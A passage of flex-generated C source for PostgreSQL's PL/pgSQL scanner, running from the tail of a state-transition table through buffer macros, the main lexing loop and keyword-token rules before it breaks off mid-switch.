37, 222, 25, 232, 62, 62, 62, 46, 42, 20, 62, 224, 231, 25, 62, 37, 233, 25, 25, 269, 114, 25, 114, 19, 18, 37, 25, 26, 39, 39, 39, 63, 63, 63, 39, 224, 231, 63, 39, 37, 233, 63, 17, 39, 269, 26, 16, 26, 26, 234, 39, 9, 179, 26, 179, 254, 26, 65, 65, 65, 65, 237, 237, 237, 67, 67, 67, 237, 39, 26, 67, 26, 26, 234, 67, 39, 179, 26, 179, 254, 26, 27, 70, 2, 0, 67, 0, 27, 0, 70, 27, 267, 27, 70, 268, 27, 0, 0, 317, 68, 68, 68, 66, 66, 66, 68, 27, 70, 66, 68, 67, 27, 66, 70, 27, 267, 27, 70, 268, 27, 30, 30, 30, 317, 335, 66, 30, 0, 69, 270, 30, 69, 0, 71, 71, 71, 69, 271, 0, 71, 30, 0, 0, 71, 0, 0, 229, 30, 229, 335, 66, 30, 69, 270, 275, 69, 77, 77, 77, 277, 69, 271, 77, 71, 0, 30, 77, 73, 73, 73, 229, 30, 229, 73, 77, 30, 36, 73, 275, 278, 36, 337, 73, 277, 283, 81, 36, 71, 81, 36, 74, 74, 74, 81, 36, 348, 74, 294, 354, 77, 74, 36, 0, 278, 76, 36, 337, 73, 283, 81, 36, 76, 81, 36, 305, 76, 74, 81, 36, 38, 348, 294, 38, 354, 306, 38, 80, 80, 80, 76, 38, 308, 80, 309, 38, 76, 80, 314, 305, 76, 74, 79, 79, 79, 38, 315, 38, 79, 306, 38, 0, 79, 0, 0, 38, 308, 80, 309, 38, 72, 72, 314, 90, 72, 90, 83, 83, 83, 90, 315, 72, 83, 0, 79, 72, 83, 82, 82, 82, 362, 80, 0, 82, 0, 72, 72, 82, 90, 72, 90, 274, 274, 274, 90, 72, 84, 274, 79, 72, 78, 78, 78, 84, 125, 362, 78, 84, 84, 82, 78, 125, 85, 85, 85, 125, 0, 78, 85, 78, 0, 84, 85, 78, 281, 281, 281, 84, 0, 125, 281, 84, 84, 82, 86, 125, 0, 89, 86, 125, 89, 86, 78, 0, 78, 89, 86, 316, 78, 0, 87, 87, 87, 318, 326, 0, 87, 0, 0, 86, 87, 89, 86, 363, 89, 86, 88, 88, 88, 89, 86, 316, 88, 91, 91, 91, 88, 318, 326, 91, 92, 92, 92, 91, 87, 333, 92, 93, 363, 93, 92, 0, 0, 93, 95, 95, 95, 0, 88, 334, 95, 96, 96, 96, 95, 0, 336, 96, 87, 333, 92, 96, 93, 127, 93, 97, 97, 97, 93, 0, 127, 97, 88, 334, 127, 97, 99, 99, 99, 95, 336, 96, 99, 0, 92, 94, 99, 98, 127, 98, 0, 338, 94, 98, 127, 97, 94, 94, 127, 94, 282, 282, 282, 95, 340, 96, 282, 100, 100, 100, 94, 345, 98, 100, 98, 338, 94, 100, 98, 97, 94, 94, 0, 94, 101, 101, 101, 367, 340, 349, 101, 102, 0, 102, 101, 345, 100, 102, 111, 111, 111, 111, 0, 0, 111, 113, 113, 113, 111, 0, 0, 113, 367, 349, 101, 113, 102, 0, 102, 351, 100, 0, 102, 115, 115, 115, 115, 120, 120, 120, 120, 122, 122, 122, 123, 123, 123, 122, 101, 0, 123, 122, 353, 351, 123, 124, 126, 124, 133, 123, 133, 124, 0, 126, 133, 0, 128, 126, 126, 128, 129, 361, 0, 129, 128, 0, 353, 0, 129, 0, 124, 126, 124, 133, 123, 133, 124, 126, 0, 133, 128, 126, 126, 128, 129, 361, 0, 129, 128, 130, 130, 130, 129, 0, 0, 130, 131, 131, 131, 130, 0, 0, 131, 0, 130, 0, 131, 0, 132, 132, 132, 0, 0, 135, 132, 135, 0, 131, 132, 135, 134, 134, 134, 0, 0, 136, 134, 136, 0, 130, 134, 136, 0, 137, 137, 137, 0, 132, 135, 137, 135, 0, 131, 137, 135, 138, 0, 138, 0, 0, 136, 138, 136, 139, 139, 139, 136, 0, 0, 139, 0, 132, 0, 139, 0, 137, 0, 140, 140, 140, 138, 0, 138, 140, 0, 0, 138, 140, 141, 141, 141, 0, 142, 144, 141, 142, 144, 0, 141, 137, 142, 144, 0, 140, 143, 0, 143, 0, 0, 0, 143, 0, 145, 145, 145, 0, 142, 144, 145, 142, 144, 0, 145, 0, 142, 144, 0, 140, 0, 143, 0, 143, 146, 146, 146, 143, 0, 147, 146, 147, 0, 0, 146, 147, 148, 148, 148, 149, 0, 149, 148, 0, 150, 149, 148, 150, 151, 0, 152, 0, 150, 146, 147, 151, 147, 152, 0, 151, 147, 152, 0, 0, 149, 0, 149, 148, 150, 0, 149, 150, 0, 151, 0, 152, 150, 146, 0, 151, 0, 152, 153, 151, 0, 152, 154, 154, 154, 153, 0, 148, 154, 153, 0, 155, 154, 156, 155, 0, 156, 154, 0, 155, 0, 156, 157, 153, 157, 0, 0, 0, 157, 153, 0, 159, 0, 153, 159, 155, 0, 156, 155, 159, 156, 0, 154, 155, 0, 156, 0, 157, 0, 157, 158, 158, 158, 157, 0, 159, 158, 161, 159, 160, 158, 160, 0, 159, 161, 160, 163, 0, 161, 162, 0, 162, 0, 163, 164, 162, 0, 163, 0, 0, 0, 164, 161, 0, 160, 164, 160, 0, 161, 158, 160, 163, 161, 0, 162, 165, 162, 163, 165, 164, 162, 163, 0, 165, 0, 164, 0, 0, 0, 164, 170, 170, 170, 170, 172, 172, 172, 0, 0, 165, 172, 0, 165, 0, 172, 0, 0, 165, 176, 176, 176, 176, 0, 0, 176, 177, 177, 177, 176, 181, 182, 177, 178, 178, 178, 177, 181, 182, 178, 0, 181, 182, 178, 180, 180, 180, 180, 183, 0, 183, 0, 0, 190, 183, 181, 182, 184, 184, 184, 190, 181, 182, 184, 190, 181, 182, 184, 185, 0, 185, 0, 0, 183, 185, 183, 0, 186, 190, 183, 186, 187, 187, 187, 190, 186, 0, 187, 190, 184, 0, 187, 0, 185, 0, 185, 0, 0, 0, 185, 0, 186, 187, 0, 186, 188, 188, 188, 0, 186, 0, 188, 0, 184, 189, 188, 0, 189, 0, 0, 188, 0, 189, 191, 191, 191, 192, 187, 192, 191, 0, 0, 192, 191, 0, 0, 193, 0, 189, 0, 0, 189, 0, 193, 0, 188, 189, 193, 194, 194, 194, 192, 195, 192, 194, 195, 0, 192, 194, 0, 195, 193, 196, 196, 196, 0, 0, 193, 196, 0, 0, 193, 196, 0, 0, 0, 195, 194, 0, 195, 197, 197, 197, 0, 195, 0, 197, 198, 198, 198, 197, 0, 0, 198, 199, 199, 199, 198, 0, 0, 199, 194, 197, 0, 199, 200, 200, 200, 201, 201, 201, 200, 0, 0, 201, 200, 0, 0, 201, 202, 202, 202, 203, 203, 203, 202, 0, 197, 203, 202, 0, 205, 203, 205, 0, 200, 0, 205, 206, 206, 206, 207, 207, 207, 206, 0, 208, 207, 206, 208, 0, 207, 0, 0, 208, 209, 205, 209, 205, 200, 211, 209, 205, 211, 0, 210, 210, 210, 211, 0, 208, 210, 0, 208, 0, 210, 0, 214, 208, 214, 209, 0, 209, 214, 211, 0, 209, 211, 212, 212, 212, 210, 211, 0, 212, 213, 213, 213, 212, 0, 0, 213, 214, 215, 214, 213, 215, 216, 214, 216, 0, 215, 0, 216, 0, 210, 0, 0, 212, 230, 230, 230, 230, 0, 0, 213, 0, 215, 0, 0, 215, 219, 216, 219, 216, 215, 0, 219, 216, 0, 0, 221, 212, 221, 217, 217, 217, 221, 0, 213, 217, 218, 218, 218, 217, 0, 219, 218, 219, 0, 0, 218, 219, 220, 220, 220, 221, 0, 221, 220, 0, 0, 221, 220, 226, 226, 226, 226, 0, 0, 226, 227, 227, 227, 226, 0, 0, 227, 228, 228, 228, 227, 0, 0, 228, 0, 0, 0, 228, 235, 235, 235, 235, 238, 238, 238, 239, 239, 239, 238, 0, 0, 239, 238, 0, 0, 239, 240, 240, 240, 241, 241, 241, 240, 0, 0, 241, 240, 0, 0, 241, 242, 0, 0, 0, 241, 0, 0, 242, 243, 243, 243, 242, 0, 0, 243, 0, 0, 0, 243, 0, 244, 244, 244, 0, 246, 242, 244, 246, 0, 241, 244, 242, 246, 0, 247, 242, 0, 247, 243, 245, 245, 245, 247, 248, 0, 245, 0, 0, 246, 245, 248, 246, 0, 0, 248, 0, 246, 0, 247, 0, 0, 247, 243, 0, 0, 0, 247, 0, 248, 245, 249, 249, 249, 0, 248, 0, 249, 0, 248, 0, 249, 250, 250, 250, 251, 251, 251, 250, 0, 0, 251, 250, 0, 245, 251, 252, 252, 252, 253, 253, 253, 252, 0, 260, 253, 252, 0, 0, 253, 0, 260, 0, 0, 250, 260, 0, 251, 255, 258, 255, 258, 0, 0, 255, 258, 256, 256, 256, 260, 0, 253, 256, 0, 0, 260, 256, 0, 250, 260, 0, 251, 0, 255, 258, 255, 258, 0, 0, 255, 258, 257, 257, 257, 0, 253, 256, 257, 259, 259, 259, 257, 261, 0, 259, 0, 0, 262, 259, 261, 262, 263, 0, 261, 263, 262, 264, 264, 264, 263, 256, 265, 264, 312, 312, 312, 264, 261, 265, 312, 259, 262, 265, 261, 262, 263, 0, 261, 263, 262, 0, 0, 0, 263, 0, 0, 265, 0, 264, 266, 266, 266, 265, 0, 259, 266, 265, 0, 0, 266, 272, 272, 272, 272, 280, 280, 280, 280, 284, 0, 280, 0, 264, 285, 0, 284, 285, 0, 0, 284, 0, 285, 286, 286, 286, 287, 0, 287, 286, 0, 0, 287, 286, 284, 0, 289, 0, 285, 0, 284, 285, 0, 289, 284, 0, 285, 289, 288, 288, 288, 287, 0, 287, 288, 0, 0, 287, 288, 0, 0, 289, 290, 290, 290, 0, 0, 289, 290, 0, 0, 289, 290, 0, 0, 291, 292, 291, 292, 0, 288, 291, 292, 293, 293, 293, 295, 295, 295, 293, 0, 0, 295, 293, 0, 0, 295, 0, 0, 0, 291, 292, 291, 292, 288, 0, 291, 292, 296, 296, 296, 297, 297, 297, 296, 0, 0, 297, 296, 0, 0, 297, 298, 298, 298, 299, 299, 299, 298, 0, 0, 299, 298, 301, 296, 299, 301, 300, 0, 300, 0, 301, 0, 300, 302, 302, 302, 313, 313, 313, 302, 0, 0, 313, 302, 0, 0, 301, 296, 0, 301, 298, 300, 0, 300, 301, 0, 0, 300, 303, 303, 303, 304, 304, 304, 303, 0, 0, 304, 303, 0, 0, 304, 311, 311, 311, 311, 0, 0, 311, 319, 319, 319, 304, 0, 0, 319, 0, 0, 320, 319, 320, 321, 321, 321, 320, 0, 0, 321, 322, 322, 322, 321, 0, 0, 322, 0, 324, 304, 322, 324, 0, 319, 0, 320, 324, 320, 323, 323, 323, 320, 0, 0, 323, 0, 0, 0, 323, 0, 0, 0, 324, 0, 0, 324, 328, 319, 0, 328, 324, 325, 325, 325, 328, 0, 0, 325, 0, 0, 323, 325, 327, 327, 327, 329, 329, 329, 327, 330, 328, 329, 327, 328, 0, 329, 330, 0, 328, 0, 330, 331, 331, 331, 323, 0, 343, 331, 343, 0, 0, 331, 343, 0, 330, 341, 341, 341, 0, 0, 330, 341, 0, 344, 330, 341, 342, 342, 342, 0, 344, 343, 342, 343, 344, 0, 342, 343, 346, 0, 346, 347, 347, 347, 346, 0, 0, 347, 344, 0, 355, 347, 355, 0, 344, 0, 355, 0, 344, 0, 356, 356, 356, 346, 0, 346, 356, 0, 0, 346, 356, 0, 0, 347, 0, 355, 0, 355, 358, 358, 358, 355, 365, 0, 358, 359, 359, 359, 358, 365, 0, 359, 0, 365, 0, 359, 358, 347, 366, 366, 366, 0, 0, 0, 366, 0, 0, 365, 366, 370, 370, 370, 0, 365, 0, 370, 0, 365, 0, 370, 0, 358, 373, 373, 373, 373, 373, 373, 373, 373, 373, 373, 373, 374, 374, 374, 374, 374, 374, 374, 374, 374, 374, 374, 375, 375, 375, 375, 375, 375, 375, 375, 375, 375, 375, 376, 376, 376, 376, 376, 376, 376, 376, 376, 376, 376, 377, 0, 0, 0, 377, 377, 378, 378, 378, 0, 378, 378, 0, 378, 378, 378, 379, 379, 379, 379, 379, 379, 379, 0, 379, 379, 379, 380, 380, 0, 380, 380, 380, 380, 380, 380, 380, 380, 381, 381, 381, 381, 381, 0, 381, 381, 381, 381, 381, 382, 0, 0, 0, 0, 382, 383, 383, 383, 383, 383, 383, 383, 383, 383, 383, 383, 384, 0, 0, 0, 384, 384, 385, 385, 0, 0, 385, 385, 385, 385, 385, 385, 385, 386, 386, 386, 386, 0, 0, 0, 0, 0, 386, 387, 0, 0, 0, 387, 387, 388, 388, 388, 388, 0, 0, 0, 0, 0, 388, 389, 389, 389, 389, 389, 389, 389, 389, 389, 389, 389, 390, 390, 390, 0, 390, 390, 0, 390, 390, 390, 391, 391, 391, 391, 391, 391, 391, 391, 391, 391, 391, 392, 392, 392, 0, 392, 392, 0, 392, 392, 392, 393, 393, 393, 393, 0, 0, 0, 0, 0, 393, 394, 394, 394, 394, 0, 0, 0, 0, 0, 394, 395, 395, 395, 395, 395, 395, 395, 395, 395, 395, 395, 396, 396, 396, 0, 396, 396, 0, 0, 396, 396, 397, 397, 397, 397, 397, 397, 397, 397, 397, 397, 397, 398, 398, 398, 0, 398, 398, 0, 0, 398, 398, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372 } ; static yy_state_type yy_last_accepting_state; static char *yy_last_accepting_cpos; extern int plpgsql_base_yy_flex_debug; int plpgsql_base_yy_flex_debug = 0; /* The intent behind this definition is that it'll catch * any uses of REJECT which flex missed. */ #define REJECT reject_used_but_not_detected #define yymore() yymore_used_but_not_detected #define YY_MORE_ADJ 0 #define YY_RESTORE_YY_MORE_OFFSET char *plpgsql_base_yytext; #line 1 "scan.l" #line 2 "scan.l" /*------------------------------------------------------------------------- * * scan.l - Scanner for the PL/pgSQL * procedural language * * Portions Copyright (c) 1996-2008, PostgreSQL Global Development Group * Portions Copyright (c) 1994, Regents of the University of California * * * IDENTIFICATION * $PostgreSQL: pgsql/src/pl/plpgsql/src/scan.l,v 1.60 2008/01/01 19:46:00 momjian Exp $ * *------------------------------------------------------------------------- */ #include "plpgsql.h" #include "mb/pg_wchar.h" /* No reason to constrain amount of data slurped */ #define YY_READ_BUF_SIZE 16777216 /* Avoid exit() on fatal scanner errors (a bit ugly -- see yy_fatal_error) */ #undef fprintf #define fprintf(file, fmt, msg) ereport(ERROR, (errmsg_internal("%s", msg))) /* Handles to the buffer that the lexer uses internally */ static YY_BUFFER_STATE scanbufhandle; static char *scanbuf; static const char *scanstr; /* original input string */ static int scanner_functype; static bool scanner_typereported; static int pushback_token; static bool have_pushback_token; static const char *cur_line_start; static int cur_line_num; static char *dolqstart; /* current $foo$ quote start string */ static int dolqlen; /* signal to plpgsql_get_string_value */ bool plpgsql_SpaceScanned = false; /* $foo$ style quotes ("dollar quoting") * copied straight from the backend SQL parser */ #line 1196 "pl_scan.c" #define INITIAL 0 #define IN_STRING 1 #define IN_COMMENT 2 #define IN_DOLLARQUOTE 3 #ifndef YY_NO_UNISTD_H /* Special case for "unistd.h", since it is non-ANSI. We include it way * down here because we want the user's section 1 to have been scanned first. * The user has a chance to override it with an option. */ #include <unistd.h> #endif #ifndef YY_EXTRA_TYPE #define YY_EXTRA_TYPE void * #endif static int yy_init_globals (void ); /* Accessor methods to globals. These are made visible to non-reentrant scanners for convenience. */ int plpgsql_base_yylex_destroy (void ); int plpgsql_base_yyget_debug (void ); void plpgsql_base_yyset_debug (int debug_flag ); YY_EXTRA_TYPE plpgsql_base_yyget_extra (void ); void plpgsql_base_yyset_extra (YY_EXTRA_TYPE user_defined ); FILE *plpgsql_base_yyget_in (void ); void plpgsql_base_yyset_in (FILE * in_str ); FILE *plpgsql_base_yyget_out (void ); void plpgsql_base_yyset_out (FILE * out_str ); int plpgsql_base_yyget_leng (void ); char *plpgsql_base_yyget_text (void ); int plpgsql_base_yyget_lineno (void ); void plpgsql_base_yyset_lineno (int line_number ); /* Macros after this point can all be overridden by user definitions in * section 1. */ #ifndef YY_SKIP_YYWRAP #ifdef __cplusplus extern "C" int plpgsql_base_yywrap (void ); #else extern int plpgsql_base_yywrap (void ); #endif #endif #ifndef yytext_ptr static void yy_flex_strncpy (char *,yyconst char *,int ); #endif #ifdef YY_NEED_STRLEN static int yy_flex_strlen (yyconst char * ); #endif #ifndef YY_NO_INPUT #ifdef __cplusplus static int yyinput (void ); #else static int input (void ); #endif #endif /* Amount of stuff to slurp up with each read. */ #ifndef YY_READ_BUF_SIZE #define YY_READ_BUF_SIZE 8192 #endif /* Copy whatever the last rule matched to the standard output. */ #ifndef ECHO /* This used to be an fputs(), but since the string might contain NUL's, * we now use fwrite(). */ #define ECHO fwrite( plpgsql_base_yytext, plpgsql_base_yyleng, 1, plpgsql_base_yyout ) #endif /* Gets input and stuffs it into "buf". number of characters read, or YY_NULL, * is returned in "result". */ #ifndef YY_INPUT #define YY_INPUT(buf,result,max_size) \ if ( YY_CURRENT_BUFFER_LVALUE->yy_is_interactive ) \ { \ int c = '*'; \ int n; \ for ( n = 0; n < max_size && \ (c = getc( plpgsql_base_yyin )) != EOF && c != '\n'; ++n ) \ buf[n] = (char) c; \ if ( c == '\n' ) \ buf[n++] = (char) c; \ if ( c == EOF && ferror( plpgsql_base_yyin ) ) \ YY_FATAL_ERROR( "input in flex scanner failed" ); \ result = n; \ } \ else \ { \ errno=0; \ while ( (result = fread(buf, 1, max_size, plpgsql_base_yyin))==0 && ferror(plpgsql_base_yyin)) \ { \ if( errno != EINTR) \ { \ YY_FATAL_ERROR( "input in flex scanner failed" ); \ break; \ } \ errno=0; \ clearerr(plpgsql_base_yyin); \ } \ }\ \ #endif /* No semi-colon after return; correct usage is to write "yyterminate();" - * we don't want an extra ';' after the "return" because that will cause * some compilers to complain about unreachable statements. */ #ifndef yyterminate #define yyterminate() return YY_NULL #endif /* Number of entries by which start-condition stack grows. */ #ifndef YY_START_STACK_INCR #define YY_START_STACK_INCR 25 #endif /* Report a fatal error. */ #ifndef YY_FATAL_ERROR #define YY_FATAL_ERROR(msg) yy_fatal_error( msg ) #endif /* end tables serialization structures and prototypes */ /* Default declaration of generated scanner - a define so the user can * easily add parameters. */ #ifndef YY_DECL #define YY_DECL_IS_OURS 1 extern int plpgsql_base_yylex (void); #define YY_DECL int plpgsql_base_yylex (void) #endif /* !YY_DECL */ /* Code executed at the beginning of each rule, after plpgsql_base_yytext and plpgsql_base_yyleng * have been set up. */ #ifndef YY_USER_ACTION #define YY_USER_ACTION #endif /* Code executed at the end of each rule. */ #ifndef YY_BREAK #define YY_BREAK break; #endif #define YY_RULE_SETUP \ if ( plpgsql_base_yyleng > 0 ) \ YY_CURRENT_BUFFER_LVALUE->yy_at_bol = \ (plpgsql_base_yytext[plpgsql_base_yyleng - 1] == '\n'); \ YY_USER_ACTION /** The main scanner function which does all the work. */ YY_DECL { register yy_state_type yy_current_state; register char *yy_cp, *yy_bp; register int yy_act; #line 81 "scan.l" /* ---------- * Local variables in scanner to remember where * a string or comment started * ---------- */ int start_lineno = 0; char *start_charpos = NULL; /* ---------- * Reset the state when entering the scanner * ---------- */ BEGIN(INITIAL); plpgsql_SpaceScanned = false; /* ---------- * On the first call to a new source report the * function's type (T_FUNCTION or T_TRIGGER) * ---------- */ if (!scanner_typereported) { scanner_typereported = true; return scanner_functype; } /* ---------- * The keyword rules * ---------- */ #line 1414 "pl_scan.c" if ( !(yy_init) ) { (yy_init) = 1; #ifdef YY_USER_INIT YY_USER_INIT; #endif if ( ! (yy_start) ) (yy_start) = 1; /* first start state */ if ( ! plpgsql_base_yyin ) plpgsql_base_yyin = stdin; if ( ! plpgsql_base_yyout ) plpgsql_base_yyout = stdout; if ( ! YY_CURRENT_BUFFER ) { plpgsql_base_yyensure_buffer_stack (); YY_CURRENT_BUFFER_LVALUE = plpgsql_base_yy_create_buffer(plpgsql_base_yyin,YY_BUF_SIZE ); } plpgsql_base_yy_load_buffer_state( ); } while ( 1 ) /* loops until end-of-file is reached */ { yy_cp = (yy_c_buf_p); /* Support of plpgsql_base_yytext. */ *yy_cp = (yy_hold_char); /* yy_bp points to the position in yy_ch_buf of the start of * the current run. */ yy_bp = yy_cp; yy_current_state = (yy_start); yy_current_state += YY_AT_BOL(); yy_match: do { register YY_CHAR yy_c = yy_ec[YY_SC_TO_UI(*yy_cp)]; if ( yy_accept[yy_current_state] ) { (yy_last_accepting_state) = yy_current_state; (yy_last_accepting_cpos) = yy_cp; } while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state ) { yy_current_state = (int) yy_def[yy_current_state]; if ( yy_current_state >= 373 ) yy_c = yy_meta[(unsigned int) yy_c]; } yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c]; ++yy_cp; } while ( yy_current_state != 372 ); yy_cp = (yy_last_accepting_cpos); yy_current_state = (yy_last_accepting_state); yy_find_action: yy_act = yy_accept[yy_current_state]; YY_DO_BEFORE_ACTION; do_action: /* This label is used only to access EOF actions. */ switch ( yy_act ) { /* beginning of action switch */ case 0: /* must back up */ /* undo the effects of YY_DO_BEFORE_ACTION */ *yy_cp = (yy_hold_char); yy_cp = (yy_last_accepting_cpos); yy_current_state = (yy_last_accepting_state); goto yy_find_action; case 1: YY_RULE_SETUP #line 112 "scan.l" { return K_ASSIGN; } YY_BREAK case 2: YY_RULE_SETUP #line 113 "scan.l" { return K_ASSIGN; } YY_BREAK case 3: YY_RULE_SETUP #line 114 "scan.l" { return K_DOTDOT; } YY_BREAK case 4: YY_RULE_SETUP #line 115 "scan.l" { return K_ALIAS; } YY_BREAK case 5: YY_RULE_SETUP #line 116 "scan.l" { return K_BEGIN; } YY_BREAK case 6: YY_RULE_SETUP #line 117 "scan.l" { return K_BY; } YY_BREAK case 7: YY_RULE_SETUP #line 118 "scan.l" { return K_CLOSE; } YY_BREAK case 8: YY_RULE_SETUP #line 119 "scan.l" { return K_CONSTANT; } YY_BREAK case 9: YY_RULE_SETUP #line 120 "scan.l" { return K_CONTINUE; } YY_BREAK case 10: YY_RULE_SETUP #line 121 "scan.l" { return K_CURSOR; } YY_BREAK case 11: YY_RULE_SETUP #line 122 "scan.l" { return K_DEBUG; } YY_BREAK case 12: YY_RULE_SETUP #line 123 "scan.l" { return K_DECLARE; } YY_BREAK case 13: YY_RULE_SETUP #line 124 "scan.l" { return K_DEFAULT; } YY_BREAK case 14: YY_RULE_SETUP #line 125 "scan.l" { return K_DIAGNOSTICS; } YY_BREAK case 15: YY_RULE_SETUP #line 126 "scan.l" { return K_ELSE; } YY_BREAK case 16: YY_RULE_SETUP #line 127 "scan.l" { return K_ELSIF; } YY_BREAK case 17: YY_RULE_SETUP #line 128 "scan.l" { return K_ELSIF; } YY_BREAK case 18: YY_RULE_SETUP #line 129 "scan.l" { return K_END; } YY_BREAK case 19: YY_RULE_SETUP #line 130 "scan.l" { return K_EXCEPTION; } YY_BREAK case 20: YY_RULE_SETUP #line 131 "scan.l" { return K_EXECUTE; } YY_BREAK case 21: YY_RULE_SETUP #line 132 "scan.l" { return K_EXIT; } YY_BREAK case 22: YY_RULE_SETUP #line 133 "scan.l" { return K_FETCH; } YY_BREAK case 23: YY_RULE_SETUP #line 134 "scan.l" { return K_FOR; } YY_BREAK case 24: YY_RULE_SETUP #line 135 "scan.l" { return K_FROM; } YY_BREAK case 25: YY_RULE_SETUP #line 136 "scan.l" { return K_GET; } YY_BREAK case 26: YY_RULE_SETUP #line 137 "scan.l" { return K_IF; } YY_BREAK case 27: YY_RULE_SETUP #line 138 "scan.l" { return K_IN; } YY_BREAK case 28: YY_RULE_SETUP #line 139 "scan.l" { return K_INFO; } YY_BREAK case 29: YY_RULE_SETUP #line 140 "scan.l" { return K_INSERT; } YY_BREAK case 30: YY_RULE_SETUP #line 141 "scan.l" { return K_INTO; } YY_BREAK case 31: YY_RULE_SETUP #line 142 "scan.l" { return K_IS; } YY_BREAK case 32: YY_RULE_SETUP #line 143 "scan.l" { return K_LOG; } YY_BREAK case 33: YY_RULE_SETUP #line 144 "scan.l" { return K_LOOP; } YY_BREAK case 34: YY_RULE_SETUP #line 145 "scan.l" { return K_MOVE; } YY_BREAK case 35: /* rule 35 can match eol */ YY_RULE_SETUP #line 146 "scan.l" { return K_NOSCROLL; } YY_BREAK case 36: YY_RULE_SETUP #line 147 "scan.l" { return K_NOT; } YY_BREAK case 37: YY_RULE_SETUP #line 148 "scan.l" { return K_NOTICE; } YY_BREAK case 38: YY_RULE_SETUP #line 149 "scan.l" { return K_NULL; } YY_BREAK case 39: YY_RULE_SETUP #line 150 "scan.l" { return K_OPEN; } YY_BREAK case 40: YY_RULE_SETUP #line 151 "scan.l" { return K_OR; } YY_BREAK case 41: YY_RULE_SETUP #line 152 "scan.l" { return K_PERFORM; } YY_BREAK case 42: YY_RULE_SETUP #line 153 "scan.l" { return K_RAISE; } YY_BREAK case 43: YY_RULE_SETUP #line 154 "scan.l" { return K_RENAME; } YY_BREAK case 44: YY_RULE_SETUP #line 155 "scan.l" { return K_RESULT_OID; } YY_BREAK case 45: YY_RULE_SETUP #line 156 "scan.l" { return K_RETURN; } YY_BREAK case 46: YY_RULE_SETUP #line 157 "scan.l" { return K_REVERSE; } YY_BREAK case 47: YY_RULE_SETUP #line 158 "scan.l" { return K_ROW_COUNT; } YY_BREAK case 48: YY_RULE_SETUP #line 159 "scan.l" { return K_SCROLL; } YY_BREAK case 49: YY_RULE_SETUP #line 160 "scan.l" { return K_STRICT; } YY_BREAK case 50: YY_RULE_SETUP #line 161 "scan.l" { return K_THEN; } YY_BREAK case 51: YY_RULE_SETUP #line 162 "scan.l" { return K_TO; } YY_BREAK case 52: YY_RULE_SETUP #line 163 "scan.l" { return K_TYPE; } YY_BREAK case 53: YY_RULE_SETUP #line 164 "scan.l" { return K_WARNING; } YY_BREAK case 54: YY_RULE_SETUP #line 165 "scan.l" { return K_WHEN; } YY_BREAK case 55: YY_RULE_SETUP #line 166 "scan.l" { return K_WHILE; } YY_BREAK case 56: YY_RULE_SETUP #line 168 "scan.l" { return O_OPTION; } YY_BREAK case 57: YY_RULE_SETUP #line 169 "scan.l" { return O_DUMP; } YY_BREAK /* ---------- * Special word rules * * We set plpgsql_error_lineno in each rule so that errors reported * in the pl_comp.c subroutines will point to the right place. * ---------- */ case 58: /* rule 58 can match eol */ YY_RULE_SETUP #line 179 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_word(plpgsql_base_yytext); } YY_BREAK case 59: /* rule 59 can match eol */ YY_RULE_SETUP #line 182 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_dblword(plpgsql_base_yytext); } YY_BREAK case 60: /* rule 60 can match eol */ YY_RULE_SETUP #line 185 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_tripword(plpgsql_base_yytext); } YY_BREAK case 61: /* rule 61 can match eol */ YY_RULE_SETUP #line 188 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_wordtype(plpgsql_base_yytext); } YY_BREAK case 62: /* rule 62 can match eol */ YY_RULE_SETUP #line 191 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_dblwordtype(plpgsql_base_yytext); } YY_BREAK case 63: /* rule 63 can match eol */ YY_RULE_SETUP #line 194 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_tripwordtype(plpgsql_base_yytext); } YY_BREAK case 64: /* rule 64 can match eol */ YY_RULE_SETUP #line 197 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_wordrowtype(plpgsql_base_yytext); } YY_BREAK case 65: /* rule 65 can match eol */ YY_RULE_SETUP #line 200 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_dblwordrowtype(plpgsql_base_yytext); } YY_BREAK case 66: YY_RULE_SETUP #line 203 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_word(plpgsql_base_yytext); } YY_BREAK case 67: /* rule 67 can match eol */ YY_RULE_SETUP #line 206 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_dblword(plpgsql_base_yytext); } YY_BREAK case 68: /* rule 68 can match eol */ YY_RULE_SETUP #line 209 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_tripword(plpgsql_base_yytext); } YY_BREAK case 69: /* rule 69 can match eol */ YY_RULE_SETUP #line 212 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_wordtype(plpgsql_base_yytext); } YY_BREAK case 70: /* rule 70 can match eol */ YY_RULE_SETUP #line 215 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_dblwordtype(plpgsql_base_yytext); } YY_BREAK case 71: /* rule 71 can match eol */ YY_RULE_SETUP #line 218 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_tripwordtype(plpgsql_base_yytext); } YY_BREAK case 72: /* rule 72 can match eol */ YY_RULE_SETUP #line 221 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_wordrowtype(plpgsql_base_yytext); } YY_BREAK case 73: /* rule 73 can match eol */ YY_RULE_SETUP #line 224 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_dblwordrowtype(plpgsql_base_yytext); } YY_BREAK case 74: YY_RULE_SETUP #line 228 "scan.l" { return T_NUMBER; } YY_BREAK case 75: YY_RULE_SETUP #line 230 